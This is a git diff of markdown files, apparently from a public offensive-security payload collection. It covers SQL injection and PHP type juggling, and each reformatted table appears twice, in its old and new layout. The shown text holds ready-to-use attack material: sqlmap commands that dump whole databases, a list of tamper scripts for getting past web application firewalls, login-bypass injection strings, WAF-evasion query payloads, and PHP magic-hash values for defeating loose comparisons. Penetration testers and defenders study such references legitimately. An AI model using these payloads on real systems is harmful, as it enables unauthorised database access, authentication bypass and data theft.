@ -222,80 +220,79 @@ sqlmap -u "https://test.com/index.php?id=99" --load-cookie=/media/truecrypt1/TI/
python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
```
### General tamper option and tamper's list
```powershell
tamper=name_of_the_tamper
```
| Tamper | Description |
| --- | --- |
|0x2char.py | Replaces each (MySQL) 0x<hex> encoded string with equivalent CONCAT(CHAR(),…) counterpart |
|apostrophemask.py | Replaces apostrophe character with its UTF-8 full width counterpart |
|apostrophenullencode.py | Replaces apostrophe character with its illegal double unicode counterpart|
|appendnullbyte.py | Appends encoded NULL byte character at the end of payload |
|base64encode.py | Base64 all characters in a given payload |
|between.py | Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' |
|bluecoat.py | Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator |
|chardoubleencode.py | Double url-encodes all characters in a given payload (not processing already encoded) |
|charencode.py | URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54) |
|charunicodeencode.py | Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054) |
|charunicodeescape.py | Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054) |
|commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'|
|commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'|
|commentbeforeparentheses.py | Prepends (inline) comment before parentheses (e.g. ( -> /**/() |
|concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'|
|charencode.py | Url-encodes all characters in a given payload (not processing already encoded) |
|charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) |
|equaltolike.py | Replaces all occurrences of operator equal ('=') with operator 'LIKE' |
|escapequotes.py | Slash escape quotes (' and ") |
|greatest.py | Replaces greater than operator ('>') with 'GREATEST' counterpart |
|halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword |
|htmlencode.py | HTML encode (using code points) all non-alphanumeric characters (e.g. -> &#39;) |
|ifnull2casewhenisnull.py | Replaces instances like IFNULL(A, B) with CASE WHEN ISNULL(A) THEN (B) ELSE (A) END counterpart|
|ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'|
|informationschemacomment.py | Add an inline comment (/**/) to the end of all occurrences of (MySQL) “information_schema” identifier |
|least.py | Replaces greater than operator (>) with LEAST counterpart |
|lowercase.py | Replaces each keyword character with lower case value (e.g. SELECT -> select) |
|modsecurityversioned.py | Embraces complete query with versioned comment |
|modsecurityzeroversioned.py | Embraces complete query with zero-versioned comment |
|multiplespaces.py | Adds multiple spaces around SQL keywords |
|nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters|
|overlongutf8.py | Converts all characters in a given payload (not processing already encoded) |
|overlongutf8more.py | Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94) |
|percentage.py | Adds a percentage sign ('%') in front of each character |
|plus2concat.py | Replaces plus operator (+) with (MsSQL) function CONCAT() counterpart |
|plus2fnconcat.py | Replaces plus operator (+) with (MsSQL) ODBC function {fn CONCAT()} counterpart |
|randomcase.py | Replaces each keyword character with random case value |
|randomcomments.py | Add random comments to SQL keywords|
|securesphere.py | Appends special crafted string |
|sp_password.py | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs |
|space2comment.py | Replaces space character (' ') with comments |
|space2dash.py | Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') |
|space2hash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') |
|space2morehash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') |
|space2mssqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
|space2mssqlhash.py | Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') |
|space2mysqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
|space2mysqldash.py | Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') |
|space2plus.py | Replaces space character (' ') with plus ('+') |
|space2randomblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
|symboliclogical.py | Replaces AND and OR logical operators with their symbolic counterparts (&& and ||) |
|unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT |
|unmagicquotes.py | Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) |
|uppercase.py | Replaces each keyword character with upper case value 'INSERT'|
|varnish.py | Append a HTTP header 'X-originating-IP' |
|versionedkeywords.py | Encloses each non-function keyword with versioned MySQL comment |
|versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment |
|xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For'|
| Tamper | Description |
| ---------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------- | --- | --- |
| 0x2char.py | Replaces each (MySQL) 0x<hex> encoded string with equivalent CONCAT(CHAR(),…) counterpart |
| apostrophemask.py | Replaces apostrophe character with its UTF-8 full width counterpart |
| apostrophenullencode.py | Replaces apostrophe character with its illegal double unicode counterpart |
| appendnullbyte.py | Appends encoded NULL byte character at the end of payload |
| base64encode.py | Base64 all characters in a given payload |
| between.py | Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' |
| bluecoat.py | Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator |
| chardoubleencode.py | Double url-encodes all characters in a given payload (not processing already encoded) |
| charencode.py | URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54) |
| charunicodeencode.py | Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054) |
| charunicodeescape.py | Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054) |
| commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' |
| commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' |
| commentbeforeparentheses.py | Prepends (inline) comment before parentheses (e.g. ( -> /\*\*/() |
| concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' |
| charencode.py | Url-encodes all characters in a given payload (not processing already encoded) |
| charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) |
| equaltolike.py | Replaces all occurrences of operator equal ('=') with operator 'LIKE' |
| escapequotes.py | Slash escape quotes (' and ") |
| greatest.py | Replaces greater than operator ('>') with 'GREATEST' counterpart |
| halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword |
| htmlencode.py | HTML encode (using code points) all non-alphanumeric characters (e.g. -> &#39;) |
| ifnull2casewhenisnull.py | Replaces instances like IFNULL(A, B) with CASE WHEN ISNULL(A) THEN (B) ELSE (A) END counterpart |
| ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' |
| informationschemacomment.py | Add an inline comment (/\*\*/) to the end of all occurrences of (MySQL) “information_schema” identifier |
| least.py | Replaces greater than operator (>) with LEAST counterpart |
| lowercase.py | Replaces each keyword character with lower case value (e.g. SELECT -> select) |
| modsecurityversioned.py | Embraces complete query with versioned comment |
| modsecurityzeroversioned.py | Embraces complete query with zero-versioned comment |
| multiplespaces.py | Adds multiple spaces around SQL keywords |
| nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters |
| overlongutf8.py | Converts all characters in a given payload (not processing already encoded) |
| overlongutf8more.py | Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94) |
| percentage.py | Adds a percentage sign ('%') in front of each character |
| plus2concat.py | Replaces plus operator (+) with (MsSQL) function CONCAT() counterpart |
| plus2fnconcat.py | Replaces plus operator (+) with (MsSQL) ODBC function {fn CONCAT()} counterpart |
| randomcase.py | Replaces each keyword character with random case value |
| randomcomments.py | Add random comments to SQL keywords |
| securesphere.py | Appends special crafted string |
| sp_password.py | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs |
| space2comment.py | Replaces space character (' ') with comments |
| space2dash.py | Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') |
| space2hash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') |
| space2morehash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') |
| space2mssqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
| space2mssqlhash.py | Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') |
| space2mysqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
| space2mysqldash.py | Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') |
| space2plus.py | Replaces space character (' ') with plus ('+') |
| space2randomblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
| symboliclogical.py | Replaces AND and OR logical operators with their symbolic counterparts (&& and | | ) |
| unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT |
| unmagicquotes.py | Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) |
| uppercase.py | Replaces each keyword character with upper case value 'INSERT' |
| varnish.py | Append a HTTP header 'X-originating-IP' |
| versionedkeywords.py | Encloses each non-function keyword with versioned MySQL comment |
| versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment |
| xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For' |
### SQLmap without SQL injection
You can use SQLmap to access a database via its port instead of a URL.
```ps1
sqlmap.py -d "mysql://user:pass@ip/database" --dump-all
sqlmap.py -d "mysql://user:pass@ip/database" --dump-all
```
## Authentication bypass
@ -375,7 +372,7 @@ admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin';-- azer
admin';-- azer
admin" #
admin"/*
admin" or "1"="1
@ -447,12 +444,11 @@ Because this row already exists, the ON DUPLICATE KEY UPDATE keyword tells MySQL
After this, we can simply authenticate with “admin@example.com” and the password “qwerty”!
```
## Generic WAF Bypass
### White spaces alternatives
* No space allowed (`%20`) - bypass using whitespace alternatives
- No space allowed (`%20`) - bypass using whitespace alternatives
```sql
?id=1%09and%091=1%09--
?id=1%0Dand%0D1=1%0D--
@ -461,32 +457,31 @@ After this, we can simply authenticate with “admin@example.com” and the pass
?id=1%0Aand%0A1=1%0A--
?id=1%A0and%A01=1%A0--
```
* No whitespace - bypass using comments
- No whitespace - bypass using comments
```sql
?id=1/*comment*/and/**/1=1/**/--
```
* No Whitespace - bypass using parenthesis
- No Whitespace - bypass using parenthesis
```sql
?id=(1)and(1)=(1)--
```
* Whitespace alternatives by DBMS
- Whitespace alternatives by DBMS
```sql
-- Example of query where spaces were replaced by ascii characters above 0x80
♀SELECT§*⌂FROM☺users♫WHERE♂1☼=¶1‼
```
| DBMS | ASCII characters in hexadicimal |
| ---------- | ------------------------------- |
| SQLite3 | 0A, 0D, 0C, 09, 20 |
| MySQL 5 | 09, 0A, 0B, 0C, 0D, A0, 20 |
| MySQL 3 | 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20, 7F, 80, 81, 88, 8D, 8F, 90, 98, 9D, A0 |
| PostgreSQL | 0A, 0D, 0C, 09, 20 |
| Oracle 11g | 00, 0A, 0D, 0C, 09, 20 |
| MSSQL | 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20 |
| DBMS | ASCII characters in hexadicimal |
| ---------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| SQLite3 | 0A, 0D, 0C, 09, 20 |
| MySQL 5 | 09, 0A, 0B, 0C, 0D, A0, 20 |
| MySQL 3 | 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20, 7F, 80, 81, 88, 8D, 8F, 90, 98, 9D, A0 |
| PostgreSQL | 0A, 0D, 0C, 09, 20 |
| Oracle 11g | 00, 0A, 0D, 0C, 09, 20 |
| MSSQL | 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20 |
### No Comma Allowed
Bypass using OFFSET, FROM and JOIN
```sql
@ -495,7 +490,6 @@ SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
```
### No Equal Allowed
Bypass using LIKE/NOT IN/IN/BETWEEN
@ -507,16 +501,15 @@ Bypass using LIKE/NOT IN/IN/BETWEEN
?id=1 and substring(version(),1,1) between 3 and 4
```
### Case modification
* Bypass using uppercase/lowercase (see keyword AND)
- Bypass using uppercase/lowercase (see keyword AND)
```sql
?id=1 AND 1=1#
?id=1 AnD 1=1#
?id=1 aNd 1=1#
```
* Bypass using keywords case insensitive / Bypass using an equivalent operator
- Bypass using keywords case insensitive / Bypass using an equivalent operator
```sql
AND -> &&
OR -> ||
@ -525,48 +518,46 @@ Bypass using LIKE/NOT IN/IN/BETWEEN
WHERE -> HAVING
```
## Labs
## Labs
* [SQL injection vulnerability in WHERE clause allowing retrieval of hidden data](https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data)
* [SQL injection vulnerability allowing login bypass](https://portswigger.net/web-security/sql-injection/lab-login-bypass)
* [SQL injection with filter bypass via XML encoding](https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding)
* [SQL Labs](https://portswigger.net/web-security/all-labs#sql-injection)
- [SQL injection vulnerability in WHERE clause allowing retrieval of hidden data](https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data)
- [SQL injection vulnerability allowing login bypass](https://portswigger.net/web-security/sql-injection/lab-login-bypass)
- [SQL injection with filter bypass via XML encoding](https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding)
- [SQL Labs](https://portswigger.net/web-security/all-labs#sql-injection)
## References
* Detect SQLi
* [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
* [NetSPI SQL Injection Wiki](https://sqlwiki.netspi.com/)
* MySQL:
* [PentestMonkey's mySQL injection cheat sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
* [Reiners mySQL injection Filter Evasion Cheatsheet](https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
* [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
* [The SQL Injection Knowledge base](https://websec.ca/kb/sql_injection)
* MSSQL:
* [EvilSQL's Error/Union/Blind MSSQL Cheatsheet](http://evilsql.com/main/page2.php)
* [PentestMonkey's MSSQL SQLi injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
* ORACLE:
* [PentestMonkey's Oracle SQLi Cheatsheet](http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet)
* POSTGRESQL:
* [PentestMonkey's Postgres SQLi Cheatsheet](http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
* Others
* [SQLi Cheatsheet - NetSparker](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
* [Access SQLi Cheatsheet](http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
* [PentestMonkey's Ingres SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet)
* [Pentestmonkey's DB2 SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
* [Pentestmonkey's Informix SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet)
* [SQLite3 Injection Cheat sheet](https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet)
* [Ruby on Rails (Active Record) SQL Injection Guide](http://rails-sqli.org/)
* [ForkBombers SQLMap Tamper Scripts Update](http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html)
* [SQLi in INSERT worse than SELECT](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/)
* [Manual SQL Injection Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
* Second Order:
* [Analyzing CVE-2018-6376 Joomla!, Second Order SQL Injection](https://www.notsosecure.com/analyzing-cve-2018-6376/)
* [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/)
* Sqlmap:
* [#SQLmap protip @zh4ck](https://twitter.com/zh4ck/status/972441560875970560)
* WAF:
* [SQLi Optimization and Obfuscation Techniques](https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf) by Roberto Salgado
* [A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection](https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/)
- Detect SQLi
- [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
- [NetSPI SQL Injection Wiki](https://sqlwiki.netspi.com/)
- MySQL:
- [PentestMonkey's mySQL injection cheat sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
- [Reiners mySQL injection Filter Evasion Cheatsheet](https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
- [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
- [The SQL Injection Knowledge base](https://websec.ca/kb/sql_injection)
- MSSQL:
- [EvilSQL's Error/Union/Blind MSSQL Cheatsheet](http://evilsql.com/main/page2.php)
- [PentestMonkey's MSSQL SQLi injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
- ORACLE:
- [PentestMonkey's Oracle SQLi Cheatsheet](http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet)
- POSTGRESQL:
- [PentestMonkey's Postgres SQLi Cheatsheet](http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
- Others
- [SQLi Cheatsheet - NetSparker](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
- [Access SQLi Cheatsheet](http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
- [PentestMonkey's Ingres SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet)
- [Pentestmonkey's DB2 SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
- [Pentestmonkey's Informix SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet)
- [SQLite3 Injection Cheat sheet](https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet)
- [Ruby on Rails (Active Record) SQL Injection Guide](http://rails-sqli.org/)
- [ForkBombers SQLMap Tamper Scripts Update](http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html)
- [SQLi in INSERT worse than SELECT](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/)
- [Manual SQL Injection Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
- Second Order:
- [Analyzing CVE-2018-6376 Joomla!, Second Order SQL Injection](https://www.notsosecure.com/analyzing-cve-2018-6376/)
- [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/)
- Sqlmap:
- [#SQLmap protip @zh4ck](https://twitter.com/zh4ck/status/972441560875970560)
- WAF:
- [SQLi Optimization and Obfuscation Techniques](https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf) by Roberto Salgado
- [A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection](https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/)

155
Type Juggling/README.md
View File

@ -4,14 +4,13 @@
## Summary
* [Loose Comparison](#loose-comparison)
* [True statements](#true-statements)
* [NULL statements](#null-statements)
* [Loose Comparison](#loose-comparison)
* [Magic Hashes](#magic-hashes)
* [Exploit](#exploit)
* [References](#references)
- [Loose Comparison](#loose-comparison)
- [True statements](#true-statements)
- [NULL statements](#null-statements)
- [Loose Comparison](#loose-comparison)
- [Magic Hashes](#magic-hashes)
- [Exploit](#exploit)
- [References](#references)
## Loose Comparison
@ -22,62 +21,61 @@
### True statements
| Statement | Output |
| --------------------------------- |:---------------:|
| `'0010e2' == '1e3'` | true |
| `'0xABCdef' == ' 0xABCdef'` | true (PHP 5.0) / false (PHP 7.0) |
| `'0xABCdef' == ' 0xABCdef'` | true (PHP 5.0) / false (PHP 7.0) |
| `'0x01' == 1` | true (PHP 5.0) / false (PHP 7.0) |
| `'0x1234Ab' == '1193131'` | true |
| `'123' == 123` | true |
| `'123a' == 123` | true |
| `'abc' == 0` | true |
| `'' == 0 == false == NULL` | true |
| `'' == 0` | true |
| `0 == false ` | true |
| `false == NULL` | true |
| `NULL == ''` | true |
| Statement | Output |
| ------------------------------- | :------------------------------: |
| `'0010e2' == '1e3'` | true |
| `'0xABCdef' == ' 0xABCdef'` | true (PHP 5.0) / false (PHP 7.0) |
| `'0xABCdef' == ' 0xABCdef'` | true (PHP 5.0) / false (PHP 7.0) |
| `'0x01' == 1` | true (PHP 5.0) / false (PHP 7.0) |
| `'0x1234Ab' == '1193131'` | true |
| `'123' == 123` | true |
| `'123a' == 123` | true |
| `'abc' == 0` | true |
| `'' == 0 == false == NULL` | true |
| `'' == 0` | true |
| `0 == false ` | true |
| `false == NULL` | true |
| `NULL == ''` | true |
> PHP8 won't try to cast string into numbers anymore, thanks to the Saner string to number comparisons RFC, meaning that collision with hashes starting with 0e and the likes are finally a thing of the past! The Consistent type errors for internal functions RFC will prevent things like `0 == strcmp($_GET['username'], $password)` bypasses, since strcmp won't return null and spit a warning any longer, but will throw a proper exception instead.
> PHP8 won't try to cast string into numbers anymore, thanks to the Saner string to number comparisons RFC, meaning that collision with hashes starting with 0e and the likes are finally a thing of the past! The Consistent type errors for internal functions RFC will prevent things like `0 == strcmp($_GET['username'], $password)` bypasses, since strcmp won't return null and spit a warning any longer, but will throw a proper exception instead.
![LooseTypeComparison](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Type%20Juggling/Images/table_representing_behavior_of_PHP_with_loose_type_comparisons.png?raw=true)
Loose Type Comparisons occurs in many languages:
* [MariaDB](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Mariadb)
* [MySQL](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Mysql)
* [NodeJS](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/NodeJS)
* [PHP](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/PHP)
* [Perl](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Perl)
* [Postgres](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Postgres)
* [Python](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Python)
* [SQLite](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/SQLite/2.6.0)
- [MariaDB](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Mariadb)
- [MySQL](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Mysql)
- [NodeJS](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/NodeJS)
- [PHP](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/PHP)
- [Perl](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Perl)
- [Postgres](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Postgres)
- [Python](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Python)
- [SQLite](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/SQLite/2.6.0)
### NULL statements
| Function | Statement | Output |
| -------- | -------------------------- |:---------------:|
| sha1 | `var_dump(sha1([]));` | NULL |
| md5 | `var_dump(md5([]));` | NULL |
| Function | Statement | Output |
| -------- | --------------------- | :----: |
| sha1 | `var_dump(sha1([]));` | NULL |
| md5 | `var_dump(md5([]));` | NULL |
## Magic Hashes
> Magic hashes arise due to a quirk in PHP's type juggling, when comparing string hashes to integers. If a string hash starts with "0e" followed by only numbers, PHP interprets this as scientific notation and the hash is treated as a float in comparison operations.
> Magic hashes arise due to a quirk in PHP's type juggling, when comparing string hashes to integers. If a string hash starts with "0e" followed by only numbers, PHP interprets this as scientific notation and the hash is treated as a float in comparison operations.
| Hash | "Magic" Number / String | Magic Hash | Found By / Description |
| ---- | -------------------------- |:---------------------------------------------:| -------------:|
| MD4 | gH0nAdHk | 0e096229559581069251163783434175 | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) |
| MD4 | if+hTai | 00e90130237707355082822449868597 | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) |
| MD5 | 240610708 | 0e462097431906509019562988736854 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
| MD5 | QNKCDZO | 0e830400451993494058024219903391 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
| MD5 | 0e1137126905 | 0e291659922323405260514745084877 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
| MD5 | 0e215962017 | 0e291242476940776845150308577824 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
| MD5 | 129581926211651571912466741651878684928 | 06da5430449f8f6f23dfc1276f722738 | Raw: ?T0D??o#??'or'8.N=? |
| SHA1 | 10932435112 | 0e07766915004133176347055865026311692244 | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham |
| SHA-224 | 10885164793773 | 0e281250946775200129471613219196999537878926740638594636 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1138075224010833921) |
| SHA-256 | 34250003024812 | 0e46289032038065916139621039085883773413820991920706299695051332 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1148586399207178241) |
| SHA-256 | TyNOQHUS | 0e66298694359207596086558843543959518835691168370379069085300385 | [@Chick3nman512](https://twitter.com/Chick3nman512/status/1150137800324526083)
| Hash | "Magic" Number / String | Magic Hash | Found By / Description |
| ------- | --------------------------------------- | :--------------------------------------------------------------: | -------------------------------------------------------------------------------: |
| MD4 | gH0nAdHk | 0e096229559581069251163783434175 | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) |
| MD4 | IiF+hTai | 00e90130237707355082822449868597 | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) |
| MD5 | 240610708 | 0e462097431906509019562988736854 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
| MD5 | QNKCDZO | 0e830400451993494058024219903391 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
| MD5 | 0e1137126905 | 0e291659922323405260514745084877 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
| MD5 | 0e215962017 | 0e291242476940776845150308577824 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
| MD5 | 129581926211651571912466741651878684928 | 06da5430449f8f6f23dfc1276f722738 | Raw: ?T0D??o#??'or'8.N=? |
| SHA1 | 10932435112 | 0e07766915004133176347055865026311692244 | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham |
| SHA-224 | 10885164793773 | 0e281250946775200129471613219196999537878926740638594636 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1138075224010833921) |
| SHA-256 | 34250003024812 | 0e46289032038065916139621039085883773413820991920706299695051332 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1148586399207178241) |
| SHA-256 | TyNOQHUS | 0e66298694359207596086558843543959518835691168370379069085300385 | [@Chick3nman512](https://twitter.com/Chick3nman512/status/1150137800324526083) |
```php
<?php
@ -97,7 +95,7 @@ function validate_cookie($cookie,$key){
$hash = hash_hmac('md5', $cookie['username'] . '|' . $cookie['expiration'], $key);
if($cookie['hmac'] != $hash){ // loose comparison
return false;
}
else{
echo "Well done";
@ -108,41 +106,42 @@ function validate_cookie($cookie,$key){
